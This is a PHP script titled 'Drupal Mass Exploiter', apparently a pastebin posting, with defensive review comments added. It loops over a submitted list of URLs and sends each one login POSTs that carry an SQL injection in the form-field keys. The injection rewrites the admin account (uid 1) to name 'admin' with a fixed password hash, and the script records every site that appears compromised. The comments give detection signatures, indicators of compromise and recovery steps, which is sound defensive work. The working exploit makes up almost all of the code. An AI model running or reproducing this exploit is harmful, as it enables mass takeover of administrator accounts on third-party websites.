S4mom

Drupal Mass Exploiter

Feb 1st, 2017
  1. <?php
     // NOTE(review, defensive reading): flat script that prints an HTML form with a
     // `urls` textarea and then, for every submitted line, sends two crafted login
     // POSTs to that site and records the sites whose response contains a marker
     // string. The crafted form-field *key* embeds an SQL UPDATE on the `users`
     // table, so the script depends on an SQL injection through request array keys
     // in the target's login handling. The affected releases are not stated on this
     // page; take them from the vendor security advisory.
     //
     // Triage guidance: a site that received such a request while unpatched should
     // be treated as compromised. Compare uid 1's name/pass/status with a known-good
     // backup, reset credentials, invalidate sessions, review for further changes,
     // and apply the vendor fix.
  2. echo'<form method="POST" action="">
  3.        <center>
  4.            <font face="Goudy Stout" color="Blue" size="5"> Drupal Mass Exploiter By Dr.S4mom </font></font><br>
  5.    <form method="GET" action="">
  6. <form method="POST" action="">
  7. <textarea name="urls" cols="50" rows="16" placeholder="http://www.site.com/" ></textarea><br>
  8. <input type="submit" name="submit" value="submit">
  9. </form>
  10. ';
     // Target list: one URL per line, split on CRLF only, whitespace trimmed below.
  11. $urls = $_POST['urls'];
  12. $sites = explode("\r\n",$urls);
  13. foreach($sites as $url){
  14. $url =trim($url);
  15.  
     // Forensic artefact: `resault.txt` is opened for append on every iteration but
     // is neither written to nor closed in the visible code. Together with
     // `DRUPAL-HACKED.txt` (below) it is a file name to search for on a host
     // suspected of having run this tool.
  16. $file = fopen("resault.txt", "a");
     // Suppresses PHP error reporting for the rest of the run.
  17. error_reporting(0);
  18. if (isset($_POST['submit'])) {
  19. //$url = $_POST['url'];
     // Detection (request side): the body contains a parameter whose key is
     // `name[0;update users set ...;#]` (SQL text inside the brackets of a form
     // field name) together with `form_id=user_login`. A normal login submission
     // sends `name` as a plain string, so keys containing `;`, quotes or spaces
     // are worth alerting on and rejecting at a WAF or reverse proxy.
     // Impact on a vulnerable target, as written in the payload: the row with
     // uid 1 gets name 'admin', status 1 and the hard-coded `$S$...` hash.
     // That hash is an indicator of compromise: search the `users.pass` column
     // for it. The script's own output claims it corresponds to password "admin".
  20. $post_data = "name[0;update users set name %3D 'admin' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
     // The stream context sets only method, Content-Type and body. No User-Agent is
     // configured here, so requests presumably arrive without one unless the
     // sending host's php.ini `user_agent` is set. This is a secondary log
     // signal, to be confirmed against real traffic.
  21. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  22. ", 'content' => $post_data));
  23. $ctx = stream_context_create($params);
     // First attempt: POST to `<url>/user/login/`.
  24. $data = file_get_contents($url . '/user/login/', null, $ctx);
  25. echo "<h4>Scanning at \"/user/login/</h4>\"";
     // Success heuristic only: the response must contain a PHP warning text
     // ('mb_strlen() expects parameter 1 to be string') or 'FcUk Crap' (the two
     // values submitted above, presumably echoed back in an error message).
     // Nothing here verifies that the UPDATE ran, so logged hits are candidates.
     // Defender note: the warning marker is visible only when the site prints PHP
     // warnings to visitors. Keeping error display off in production hides that
     // marker from the tool; whether it stops the injection itself is not shown here — patching does.
  26. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
     // Appends the matched URL to `DRUPAL-HACKED.txt` in the script's working directory.
  27. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  28. echo "Success! User:admin Pass:admin at {$url}/user/login <br>";
  29. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/resault.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  30. echo "<br><br>";
  31. fwrite($fp, "Succes! User:admin Pass:admin -> {$url}/user/login");
  32. fwrite($fp, "
  33. ");
  34. fwrite($fp, "
  35. ");
  36. fclose($fp);
  37. } else {
  38. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  39. }
  40. }
  41. if (isset($_POST['submit'])) {
  42. //$url = "http://" . $_GET['url'] . "/";
     // Second attempt against the same site: identical injected key, but with
     // `form_id=user_login_block` and extra fields (`test3`, `test2=test`), posted
     // to `<url>?q=node&destination=node` instead of the login page. Log searches
     // and WAF rules should cover both request shapes.
  43. $post_data = "name[0;update users set name %3D 'admin' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  44. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  45. ", 'content' => $post_data));
  46. $ctx = stream_context_create($params);
  47. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  48. echo "<h4>Scanning at \"Index</h4>\"";
     // Here only the PHP warning text counts as a hit; see the heuristic caveat on
     // the first attempt.
  49. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  50. $fp = fopen("DRUPAL-HACKED.txt", 'a');
  51. echo "Success! User:admin Pass:admin at {$url}/user/login <br>";
  52. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/resault.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
  53. echo "<br><br>";
  54. fwrite($fp, "Success! User:admin Pass:admin -> {$url}/user/login");
  55. fwrite($fp, "
  56. ");
  57. fwrite($fp, "");
  58. fwrite($fp, "
  59. ");
  60. fclose($fp);
  61. } else {
  62. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  63. echo "<br><br>";
  64. }
  65. }
  66. //==========
  67. }// end foreach
  68.  
  69.  
  70. ?>